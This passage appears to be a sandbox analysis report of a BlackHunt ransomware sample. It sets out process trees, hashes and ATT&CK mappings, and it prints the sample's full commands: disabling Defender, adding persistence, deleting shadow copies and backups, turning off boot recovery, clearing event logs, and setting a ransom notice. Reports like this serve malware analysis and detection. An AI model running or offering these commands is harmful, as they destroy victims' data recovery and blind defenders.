PID 4848 wrote to memory of 4260 4848 f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe 116 PID 1284 wrote to memory of 2876 1284 cmd.exe 115 PID 1284 wrote to memory of 2876 1284 cmd.exe 115 PID 1348 wrote to memory of 4768 1348 cmd.exe 114 PID 1348 wrote to memory of 4768 1348 cmd.exe 114 PID 4848 wrote to memory of 4884 4848 f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe 117 PID 4848 wrote to memory of 4884 4848 f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe 117 PID 4848 wrote to memory of 5072 4848 f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe 119 PID 4848 wrote to memory of 5072 4848 f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe 119 PID 5112 wrote to memory of 3532 5112 cmd.exe 123 PID 5112 wrote to memory of 3532 5112 cmd.exe 123 PID 4848 wrote to memory of 440 4848 f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe 122 PID 4848 wrote to memory of 440 4848 f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe 122 PID 4848 wrote to memory of 60 4848 f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe 125 PID 4848 wrote to memory of 60 4848 f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe 125 PID 536 wrote to memory of 5096 536 cmd.exe 127 PID 536 wrote to memory of 5096 536 cmd.exe 127 PID 4848 wrote to memory of 4960 4848 f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe 128 PID 4848 wrote to memory of 4960 4848 f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe 128 PID 4848 wrote to memory of 1000 4848 f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe 129 PID 4848 wrote to memory of 1000 4848 f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe 129 PID 5072 wrote to memory of 4144 5072 cmd.exe 130 PID 5072 wrote to memory of 4144 5072 cmd.exe 130 -
System policy modification 1 TTPs 3 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe"C:\Users\Admin\AppData\Local\Temp\f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe"1⤵
- UAC bypass
- Checks computer location settings
- Checks whether UAC is enabled
- Enumerates connected drives
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of WriteProcessMemory
- System policy modification
PID:4848 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Black" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2284 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Black" /f3⤵
- Modifies registry class
PID:3756
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Black\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:64 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Black\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:4616
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Black" /f2⤵
- Suspicious use of WriteProcessMemory
PID:1908 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Black" /f3⤵
- Modifies registry class
PID:5068
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Black\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:1756 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Black\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:1740
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f2⤵
- Suspicious use of WriteProcessMemory
PID:4244 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f3⤵
- Adds Run key to start application
PID:1840
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:5084 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f3⤵PID:4688
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:4460 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:4800
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f2⤵
- Suspicious use of WriteProcessMemory
PID:1284 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f3⤵PID:2876
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:2944 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f3⤵PID:4148
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f2⤵
- Suspicious use of WriteProcessMemory
PID:5112 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f3⤵PID:3532
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f2⤵
- Suspicious use of WriteProcessMemory
PID:1348 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f3⤵PID:4768
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f2⤵
- Suspicious use of WriteProcessMemory
PID:536 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f3⤵PID:5096
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f2⤵PID:4260
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f3⤵PID:4380
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f2⤵PID:4884
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f3⤵PID:4064
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:5072 -
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f3⤵PID:4144
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f2⤵PID:440
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f3⤵PID:3016
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f2⤵PID:60
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f3⤵PID:1948
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:4960
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:1856
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f2⤵PID:1000
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f3⤵PID:4752
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:4496
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:4216
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f2⤵PID:1972
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f3⤵PID:4784
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f2⤵PID:1776
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f3⤵PID:4116
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f2⤵PID:732
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f3⤵PID:1788
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f2⤵PID:1168
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f3⤵PID:4588
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f2⤵PID:3252
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f3⤵PID:3040
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f2⤵PID:3656
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f3⤵PID:4608
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f2⤵PID:4652
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f3⤵PID:5084
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f2⤵PID:5080
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f3⤵PID:1316
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f2⤵PID:3212
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f3⤵PID:4156
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityService" /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe -backups " /f2⤵PID:4468
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityService" /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe -backups " /f3⤵
- Adds Run key to start application
PID:2392
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SchTasks.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Update service Windows System" /TR "C:\Users\Admin\AppData\Local\Temp\f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe -backups" /f2⤵PID:3292
-
C:\Windows\system32\schtasks.exeSchTasks.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Update service Windows System" /TR "C:\Users\Admin\AppData\Local\Temp\f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe -backups" /f3⤵
- Creates scheduled task(s)
PID:3732
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:1944
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:4168
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:4152
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:2060
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:548
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:2528
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:4460
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:1016
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:4524
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:5072
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:1708
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:4576
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D C:\2⤵PID:2420
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D C:\3⤵PID:796
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D M:\2⤵PID:2208
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D M:\3⤵
- Enumerates connected drives
PID:3112
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Setup2⤵PID:1848
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Setup3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:3748
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl System2⤵PID:3756
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl System3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:1192
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Application2⤵PID:3212
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Application3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:4404
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security2⤵PID:2968
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:2348
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security /e:false2⤵PID:4360
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security /e:false3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:3032
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:1016
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:476
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:5096
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:5004
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:2272
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:2876
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:264
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:5108
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:2788
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:3772
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f2⤵PID:920
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f3⤵PID:5024
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f2⤵PID:1156
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f3⤵PID:5044
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:5056
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:540
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG DELETE "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "HealthService" /f2⤵PID:628
-
C:\Windows\system32\reg.exeREG DELETE "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "HealthService" /f3⤵PID:820
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f2⤵PID:4700
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f3⤵PID:3860
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f2⤵PID:5040
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f3⤵PID:2284
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /IM mshta.exe /f2⤵PID:1240
-
C:\Windows\system32\taskkill.exetaskkill /IM mshta.exe /f3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4532
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c notepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt2⤵PID:1996
-
C:\Windows\system32\notepad.exenotepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt3⤵PID:2400
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\ProgramData\#BlackHunt_ReadMe.hta2⤵
- Checks computer location settings
- Modifies registry class
PID:4972 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\ProgramData\#BlackHunt_ReadMe.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}3⤵PID:4976
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c start /min cmd /c del /F C:\Users\Admin\AppData\Local\Temp\f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe2⤵PID:908
-
C:\Windows\SysWOW64\cmd.execmd /c del /F C:\Users\Admin\AppData\Local\Temp\f725792a5ef0512f3c5356d79fb3be5afcbaffaa4af41498342f7d09d703761f.exe3⤵PID:1908
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3992
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4116
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:1544
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵
- Checks SCSI registry key(s)
PID:440
Network
MITRE ATT&CK Enterprise v6
Persistence
Modify Existing Service
1Registry Run Keys / Startup Folder
1Scheduled Task
1Defense Evasion
Bypass User Account Control
1Disabling Security Tools
2File Deletion
3Indicator Removal on Host
1Modify Registry
5Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
10KB
MD5c4e9dc244ac49843a08da3e6609c775f
SHA1189866d7e0e5422abddf454ee31b53bef64c558f
SHA25616c664e9f9d0d8cbb60ed020016054492b4549183dc2028382c3faf47cf627e8
SHA5126c396c98254eda5b20e6e32034f9875f5cfe87a7ab8d76a65a20a2a18594a38d647fced8fec8e9457f1ee44ece7062af4bb461481d6b4f6718b2783aecda4fe2
-
Filesize
687B
MD53409cb1796ae3e9bd975c8303469b955
SHA13a126e1f3b7c4dc37676e1a2a8131ddd880591f4
SHA2565d081e33612f4ddb324934bd369d77d2fd7a749a2a568f406917d55c3e6459b5
SHA51269fafc727e0208e2494fe872eab0107746c1c9ecbec4e2709bca11b5f65547ac043095781c0105c6a6f8de0073d326c43d9ee1bf6480ef93033c76e77826cafc